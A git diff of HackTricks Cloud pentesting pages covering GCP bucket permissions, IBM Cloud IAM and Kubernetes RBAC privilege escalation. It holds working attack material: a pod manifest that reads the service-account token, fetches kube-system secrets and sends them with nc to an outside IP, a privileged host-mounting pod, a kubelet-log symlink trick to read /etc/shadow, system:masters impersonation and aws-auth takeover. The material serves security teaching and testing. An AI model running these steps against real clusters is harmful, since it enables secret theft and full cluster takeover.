+In order to grant `Storage Admin` to `allAuthenticatedUsers` it's possible to run:
+
+```bash
+gsutil iam ch allAuthenticatedUsers:admin gs://BUCKET_NAME
+```
+
+Another attack would be to **remove the bucket an d recreate it in your account to steal th ownership**.
+
+## References
+
+- [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/ibm-cloud-pentesting/README.md b/src/pentesting-cloud/ibm-cloud-pentesting/README.md new file mode 100644 index 000000000..1ce69b6e7 --- /dev/null +++ b/src/pentesting-cloud/ibm-cloud-pentesting/README.md 
@@ -0,0 +1,38 @@ +# IBM Cloud Pentesting + +## IBM Cloud Pentesting + +{{#include ../../banners/hacktricks-training.md}} + +### What is IBM cloud? (By chatGPT) + +IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud. + +When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches: + +1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele. +2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ. +3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform. +4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud. 
+ +#### Basic Information + +For some basic information about IAM and hierarchi check: + +{{#ref}} +ibm-basic-information.md +{{#endref}} + +### SSRF + +Learn how you can access the medata endpoint of IBM in the following page: + +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0 +{{#endref}} + +## References + +- [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:\~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md new file mode 100644 index 000000000..d9e32ea7f --- /dev/null +++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md @@ -0,0 +1,72 @@ +# IBM - Basic Information + +{{#include ../../banners/hacktricks-training.md}} + +## Hierarchy + +IBM Cloud resource model ([from the docs](https://www.ibm.com/blog/announcement/introducing-ibm-cloud-enterprises/)): + +
+ +Recommended way to divide projects: + +
+ +## IAM + +
+ +### Users + +Users have an **email** assigned to them. They can access the **IBM console** and also **generate API keys** to use their permissions programatically.\ +**Permissions** can be granted **directly** to the user with an access policy or via an **access group**. + +### Trusted Profiles + +These are **like the Roles of AWS** or service accounts from GCP. It's possible to **assign them to VM** instances and access their **credentials via metadata**, or even **allow Identity Providers** to use them in order to authenticate users from external platforms.\ +**Permissions** can be granted **directly** to the trusted profile with an access policy or via an **access group**. + +### Service IDs + +This is another option to allow applications to **interact with IBM cloud** and perform actions. In this case, instead of assign it to a VM or Identity Provider an **API Key can be used** to interact with IBM in a **programatic** way.\ +**Permissions** can be granted **directly** to the service id with an access policy or via an **access group**. + +### Identity Providers + +External **Identity Providers** can be configured to **access IBM cloud** resources from external platforms by accessing **trusting Trusted Profiles**. + +### Access Groups + +In the same access group **several users, trusted profiles & service ids** can be present. Each principal in the access group will **inherit the access group permissions**.\ +**Permissions** can be granted **directly** to the trusted profile with an access policy.\ +An **access group cannot be a member** of another access group. + +### Roles + +A role is a **set of granular permissions**. **A role** is dedicated to **a service**, meaning that it will only contain permissions of that service.\ +**Each service** of IAM will already have some **possible roles** to choose from to **grant a principal access to that service**: **Viewer, Operator, Editor, Administrator** (although there could be more). 
+ +Role permissions are given via access policies to principals, so if you need to give for example a **combination of permissions** of a service of **Viewer** and **Administrator**, instead of giving those 2 (and overprivilege a principal), you can **create a new role** for the service and give that new role the **granular permissions you need**. + +### Access Policies + +Access policies allows to **attach 1 or more roles of 1 service to 1 principal**.\ +When creating the policy you need to choose: + +- The **service** where permissions will be granted +- **Affected resources** +- Service & Platform **access** that will be granted + - These indicate the **permissions** that will be given to the principal to perform actions. If any **custom role** is created in the service you will also be able to choose it here. +- **Conditions** (if any) to grant the permissions + +> [!NOTE] +> To grant access to several services to a user, you can generate several access policies + +
+ +## References + +- [https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises](https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises) +- [https://cloud.ibm.com/docs/account?topic=account-iamoverview](https://cloud.ibm.com/docs/account?topic=account-iamoverview) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md similarity index 54% rename from pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md rename to src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md index 074dce60f..0cbc55061 100644 --- a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md +++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md @@ -1,19 +1,6 @@ # IBM - Hyper Protect Crypto Services -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information @@ -39,17 +26,4 @@ HSMs can be used for a wide range of applications, including secure online trans Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md similarity index 62% rename from pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md rename to src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md index 2c1d42d69..a1d9a8100 100644 --- a/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md +++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md @@ -1,19 +1,6 @@ # IBM - Hyper Protect Virtual Server -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information @@ -52,17 +39,4 @@ Compared to x64 architecture, which is the most common architecture used in serv Overall, LinuxONE is a powerful and secure platform that is well-suited for running large-scale, mission-critical workloads that require high levels of performance and reliability. While x64 architecture has its own advantages, it may not be able to provide the same level of scalability, security, and reliability as LinuxONE for certain workloads.\\ -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/kubernetes-security/README.md b/src/pentesting-cloud/kubernetes-security/README.md new file mode 100644 index 000000000..c903d3209 --- /dev/null +++ b/src/pentesting-cloud/kubernetes-security/README.md 
@@ -0,0 +1,80 @@ +# Kubernetes Pentesting + +{{#include ../../banners/hacktricks-training.md}} + +## Kubernetes Basics + +If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes: + +{{#ref}} +kubernetes-basics.md +{{#endref}} + +### Labs to practice and learn + +- [https://securekubernetes.com/](https://securekubernetes.com) +- [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) + +## Hardening Kubernetes / Automatic Tools + +{{#ref}} +kubernetes-hardening/ +{{#endref}} + +## Manual Kubernetes Pentest + +### From the Outside + +There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there. + +Depending on the configuration and your privileges you might be able to abuse that environment, for more information: + +{{#ref}} +pentesting-kubernetes-services/ +{{#endref}} + +### Enumeration inside a Pod + +If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**: + +{{#ref}} +attacking-kubernetes-from-inside-a-pod.md +{{#endref}} + +### Enumerating Kubernetes with Credentials + +You might have managed to compromise **user credentials, a user token or some service account toke**n. You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it: + +{{#ref}} +kubernetes-enumeration.md +{{#endref}} + +Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. 
If you want to abuse permissions, you first should read about it here: + +{{#ref}} +kubernetes-role-based-access-control-rbac.md +{{#endref}} + +#### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with: + +{{#ref}} +abusing-roles-clusterroles-in-kubernetes/ +{{#endref}} + +### Privesc to a different Namespace + +If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources: + +{{#ref}} +kubernetes-namespace-escalation.md +{{#endref}} + +### From Kubernetes to the Cloud + +If you have compromised a K8s account or a pod, you might be able able to move to other clouds. This is because in clouds like AWS or GCP is possible to **give a K8s SA permissions over the cloud**. + +{{#ref}} +kubernetes-pivoting-to-clouds.md +{{#endref}} + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md similarity index 71% rename from pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md rename to src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md index 20df0a56f..9cc723a9a 100644 --- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md +++ b/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md @@ -1,19 +1,6 @@ # Abusing Roles/ClusterRoles in Kubernetes -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} Here you can find some potentially dangerous Roles and ClusterRoles configurations.\ Remember that you can get all the supported resources with `kubectl api-resources` 
@@ -22,11 +9,11 @@ Remember that you can get all the supported resources with `kubectl api-resource Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**: -* Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds -* Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds -* Be able to **read secrets** as the SAs tokens are stored as secrets -* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any) -* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod. +- Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds +- Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds +- Be able to **read secrets** as the SAs tokens are stored as secrets +- Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any) +- A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod. ### Access Any Resource or Verb (Wildcard) 
@@ -78,10 +65,14 @@ metadata: namespace: kube-system spec: containers: - - name: alpine - image: alpine - command: ["/bin/sh"] - args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] + - name: alpine + image: alpine + command: ["/bin/sh"] + args: + [ + "-c", + 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000', + ] serviceAccountName: bootstrap-signer automountServiceAccountToken: true hostNetwork: true @@ -91,13 +82,12 @@ spec: The following indicates all the privileges a container can have: -* **Privileged access** (disabling protections and setting capabilities) -* **Disable namespaces hostIPC and hostPid** that can help to escalate privileges -* **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks -* **Mount hosts / inside the container** +- **Privileged access** (disabling protections and setting capabilities) +- **Disable namespaces hostIPC and hostPid** that can help to escalate privileges +- **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks +- **Mount hosts / inside the container** -{% code title="super_privs.yaml" %} -```yaml +```yaml:super_privs.yaml apiVersion: v1 kind: Pod metadata: 
@@ -108,31 +98,30 @@ spec: # Uncomment and specify a specific node you want to debug # nodeName: containers: - - image: ubuntu - command: - - "sleep" - - "3600" # adjust this as needed -- use only as long as you need - imagePullPolicy: IfNotPresent - name: ubuntu - securityContext: - allowPrivilegeEscalation: true - privileged: true - #capabilities: - # add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html - runAsUser: 0 # run as root (or any other user) - volumeMounts: - - mountPath: /host - name: host-volume + - image: ubuntu + command: + - "sleep" + - "3600" # adjust this as needed -- use only as long as you need + imagePullPolicy: IfNotPresent + name: ubuntu + securityContext: + allowPrivilegeEscalation: true + privileged: true + #capabilities: + # add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html + runAsUser: 0 # run as root (or any other user) + volumeMounts: + - mountPath: /host + name: host-volume restartPolicy: Never # we want to be intentional about running this pod hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_ volumes: - - name: host-volume - hostPath: - path: / + - name: host-volume + hostPath: + path: / ``` -{% endcode %} Create the pod with: 
@@ -152,12 +141,12 @@ Now that you can escape to the node check post-exploitation techniques in: You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template: -* **Privileged + hostPID** -* **Privileged only** -* **hostPath** -* **hostPID** -* **hostNetwork** -* **hostIPC** +- **Privileged + hostPID** +- **Privileged only** +- **hostPath** +- **hostPID** +- **hostNetwork** +- **hostIPC** _You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods) @@ -168,9 +157,9 @@ Moreover, if you can create a **pod with the host network namespace** you can ** For more information check: -{% content-ref url="pod-escape-privileges.md" %} -[pod-escape-privileges.md](pod-escape-privileges.md) -{% endcontent-ref %} +{{#ref}} +pod-escape-privileges.md +{{#endref}} ### **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs** 
@@ -197,17 +186,21 @@ spec: automountServiceAccountToken: true hostNetwork: true containers: - - name: alpine - image: alpine - command: ["/bin/sh"] - args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] - volumeMounts: - - mountPath: /root - name: mount-node-root + - name: alpine + image: alpine + command: ["/bin/sh"] + args: + [ + "-c", + 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000', + ] + volumeMounts: + - mountPath: /root + name: mount-node-root volumes: - - name: mount-node-root - hostPath: - path: / + - name: mount-node-root + hostPath: + path: / ``` ### **Pods Exec** @@ -236,7 +229,7 @@ The Kubelet service exposes the `/logs/` endpoint which is just basically **expo Therefore, an attacker with **access to write in the /var/log/ folder** of the container could abuse this behaviours in 2 ways: -* Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. Then, you will be able to exfiltrate hosts shadow file doing: +- Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. Then, you will be able to exfiltrate hosts shadow file doing: ```bash kubectl logs escaper 
@@ -246,7 +239,7 @@ failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\ # Keep incrementing tail to exfiltrate the whole file ``` -* If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files). +- If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files). ```bash curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/' 
@@ -286,46 +279,46 @@ Which was meant to prevent escapes like the previous ones by, instead of using a apiVersion: v1 kind: PersistentVolume metadata: - name: task-pv-volume-vol - labels: - type: local + name: task-pv-volume-vol + labels: + type: local spec: - storageClassName: manual - capacity: - storage: 10Gi - accessModes: - - ReadWriteOnce - hostPath: - path: "/var/log" + storageClassName: manual + capacity: + storage: 10Gi + accessModes: + - ReadWriteOnce + hostPath: + path: "/var/log" --- apiVersion: v1 kind: PersistentVolumeClaim metadata: - name: task-pv-claim-vol + name: task-pv-claim-vol spec: - storageClassName: manual - accessModes: - - ReadWriteOnce - resources: - requests: - storage: 3Gi + storageClassName: manual + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 3Gi --- apiVersion: v1 kind: Pod metadata: - name: task-pv-pod + name: task-pv-pod spec: - volumes: - - name: task-pv-storage-vol - persistentVolumeClaim: - claimName: task-pv-claim-vol - containers: - - name: task-pv-container - image: ubuntu:latest - command: [ "sh", "-c", "sleep 1h" ] - volumeMounts: - - mountPath: "/hostlogs" - name: task-pv-storage-vol + volumes: + - name: task-pv-storage-vol + persistentVolumeClaim: + claimName: task-pv-claim-vol + containers: + - name: task-pv-container + image: ubuntu:latest + command: ["sh", "-c", "sleep 1h"] + volumeMounts: + - mountPath: "/hostlogs" + name: task-pv-storage-vol ``` ### **Impersonating privileged accounts** @@ -343,7 +336,7 @@ Or use the REST API: ```bash curl -k -v -XGET -H "Authorization: Bearer " \ --H "Impersonate-Group: system:masters"\ +-H "Impersonate-Group: system:masters"\ -H "Impersonate-User: null" \ -H "Accept: application/json" \ https://:/api/v1/namespaces/kube-system/secrets/ 
@@ -377,29 +370,29 @@ kind: ClusterRole metadata: name: csr-approver rules: -- apiGroups: - - certificates.k8s.io - resources: - - certificatesigningrequests - verbs: - - get - - list - - watch - - create -- apiGroups: - - certificates.k8s.io - resources: - - certificatesigningrequests/approval - verbs: - - update -- apiGroups: - - certificates.k8s.io - resources: - - signers - resourceNames: - - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain - verbs: - - approve + - apiGroups: + - certificates.k8s.io + resources: + - certificatesigningrequests + verbs: + - get + - list + - watch + - create + - apiGroups: + - certificates.k8s.io + resources: + - certificatesigningrequests/approval + verbs: + - update + - apiGroups: + - certificates.k8s.io + resources: + - signers + resourceNames: + - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain + verbs: + - approve ``` So, with the new node CSR approved, you can **abuse** the special permissions of nodes to **steal secrets** and **escalate privileges**. @@ -418,7 +411,6 @@ The way to bypass this is just to **create a node credentials for the node name Principals that can modify **`configmaps`** in the kube-system namespace on EKS (need to be in AWS) clusters can obtain cluster admin privileges by overwriting the **aws-auth** configmap.\ The verbs needed are **`update`** and **`patch`**, or **`create`** if configmap wasn't created: -{% code overflow="wrap" %} ```bash # Check if config map exists get configmap aws-auth -n kube-system -o yaml @@ -432,7 +424,7 @@ metadata: data: mapRoles: | - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName - username: system:node:{{EC2PrivateDNSName}} + username: system:node{{EC2PrivateDNSName}} groups: - system:masters 
@@ -448,7 +440,7 @@ kubectl edit -n kube-system configmap/aws-auth data: mapRoles: | - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName - username: system:node:{{EC2PrivateDNSName}} + username: system:node{{EC2PrivateDNSName}} groups: - system:masters mapUsers: | 
@@ -457,29 +449,26 @@ data: groups: - system:masters ``` -{% endcode %} -{% hint style="warning" %} -You can use **`aws-auth`** for **persistence** giving access to users from **other accounts**. - -However, `aws --profile other_account eks update-kubeconfig --name ` **doesn't work from a different acount**. But actually `aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing` works if you put the ARN of the cluster instead of just the name.\ -To make `kubectl` work, just make sure to **configure** the **victims kubeconfig** and in the aws exec args add `--profile other_account_role` so kubectl will be using the others account profile to get the token and contact AWS. -{% endhint %} +> [!WARNING] +> You can use **`aws-auth`** for **persistence** giving access to users from **other accounts**. +> +> However, `aws --profile other_account eks update-kubeconfig --name ` **doesn't work from a different acount**. But actually `aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing` works if you put the ARN of the cluster instead of just the name.\ +> To make `kubectl` work, just make sure to **configure** the **victims kubeconfig** and in the aws exec args add `--profile other_account_role` so kubectl will be using the others account profile to get the token and contact AWS. ### Escalating in GKE There are **2 ways to assign K8s permissions to GCP principals**. In any case the principal also needs the permission **`container.clusters.get`** to be able to gather credentials to access the cluster, or you will need to **generate your own kubectl config file** (follow the next link). -{% hint style="warning" %} -When talking to the K8s api endpoint, the **GCP auth token will be sent**. 
Then, GCP, through the K8s api endpoint, will first **check if the principal** (by email) **has any access inside the cluster**, then it will check if it has **any access via GCP IAM**.\ -If **any** of those are **true**, he will be **responded**. If **not** an **error** suggesting to give **permissions via GCP IAM** will be given. -{% endhint %} +> [!WARNING] +> When talking to the K8s api endpoint, the **GCP auth token will be sent**. Then, GCP, through the K8s api endpoint, will first **check if the principal** (by email) **has any access inside the cluster**, then it will check if it has **any access via GCP IAM**.\ +> If **any** of those are **true**, he will be **responded**. If **not** an **error** suggesting to give **permissions via GCP IAM** will be given. Then, the first method is using **GCP IAM**, the K8s permissions have their **equivalent GCP IAM permissions**, and if the principal have it, it will be able to use it. -{% content-ref url="../../gcp-security/gcp-privilege-escalation/gcp-container-privesc.md" %} -[gcp-container-privesc.md](../../gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) -{% endcontent-ref %} +{{#ref}} +../../gcp-security/gcp-privilege-escalation/gcp-container-privesc.md +{{#endref}} The second method is **assigning K8s permissions inside the cluster** to the identifying the user by its **email** (GCP service accounts included). 
@@ -506,9 +495,9 @@ Then he can update/create new roles, clusterroles with better permissions than t Principals with access to the **`nodes/proxy`** subresource can **execute code on pods** via the Kubelet API (according to [**this**](https://github.com/PaloAltoNetworks/rbac-police/blob/main/lib/nodes_proxy.rego)). More information about Kubelet authentication in this page: -{% content-ref url="../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md" %} -[kubelet-authentication-and-authorization.md](../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) -{% endcontent-ref %} +{{#ref}} +../pentesting-kubernetes-services/kubelet-authentication-and-authorization.md +{{#endref}} You have an example of how to get [**RCE talking authorized to a Kubelet API here**](../pentesting-kubernetes-services/#kubelet-rce). @@ -516,7 +505,6 @@ You have an example of how to get [**RCE talking authorized to a Kubelet API her Principals that can **delete pods** (`delete` verb over `pods` resource), or **evict pods** (`create` verb over `pods/eviction` resource), or **change pod status** (access to `pods/status`) and can **make other nodes unschedulable** (access to `nodes/status`) or **delete nodes** (`delete` verb over `nodes` resource) and has control over a pod, could **steal pods from other nodes** so they are **executed** in the **compromised** **node** and the attacker can **steal the tokens** from those pods. -{% code overflow="wrap" %} ```bash patch_node_capacity(){ curl -s -X PATCH 127.0.0.1:8001/api/v1/nodes/$1/status -H "Content-Type: json-patch+json" -d '[{"op": "replace", "path":"/status/allocatable/pods", "value": "0"}]' @@ -527,7 +515,6 @@ while true; do patch_node_capacity ; done & kubectl delete pods -n kube-system ``` -{% endcode %} ### Services status (CVE-2020-8554) 
@@ -545,15 +532,13 @@ This system ensures that **users cannot elevate their privileges by modifying ro The rule stipulates that a **user can only create or update a role if they possess all the permissions the role comprises**. Moreover, the scope of the user's existing permissions must align with that of the role they are attempting to create or modify: either cluster-wide for ClusterRoles or confined to the same namespace (or cluster-wide) for Roles. -{% hint style="warning" %} -There is an exception to the previous rule. If a principal has the **verb `escalate`** over **`roles`** or **`clusterroles`** he can increase the privileges of roles and clusterroles even without having the permissions himself. -{% endhint %} +> [!WARNING] +> There is an exception to the previous rule. If a principal has the **verb `escalate`** over **`roles`** or **`clusterroles`** he can increase the privileges of roles and clusterroles even without having the permissions himself. ### **Get & Patch RoleBindings/ClusterRoleBindings** -{% hint style="danger" %} -**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.** -{% endhint %} +> [!CAUTION] +> 